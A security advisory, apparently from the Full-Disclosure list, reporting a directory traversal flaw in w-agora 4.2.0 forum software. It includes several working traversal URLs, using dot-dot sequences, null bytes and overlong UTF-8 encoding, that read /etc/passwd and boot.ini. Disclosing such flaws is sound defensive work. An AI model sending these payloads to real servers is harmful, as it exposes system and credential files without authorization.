w-agora 4.2.0 and prior Remote Directory Travel Vulnerability SEVERITY: ========= High SOFTWARE: ========= w-agora 4.2.0 http://w-agora.net INFO: ===== w-agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on your web site. DESCRIPTION: ============ W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug. Here are some examples: http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00 http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00 http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini A proof of concept video supporting this issue can be downloaded from here - http://rapidshare.de/files/4106113/probe.rar.html VENDOR STATUS ============= Vendor was contacted but no response received till date. CREDITS: ======== This vulnerability was discovered and researched by - matrix_killer of h4cky0u Security Forums. mail : matrix_k at abv.bg web : http://www.h4cky0u.org Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! ORIGINAL: ========= http://h4cky0u.org/viewtopic.php?t=2097 -- http://www.h4cky0u.org (In)Security at its best... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/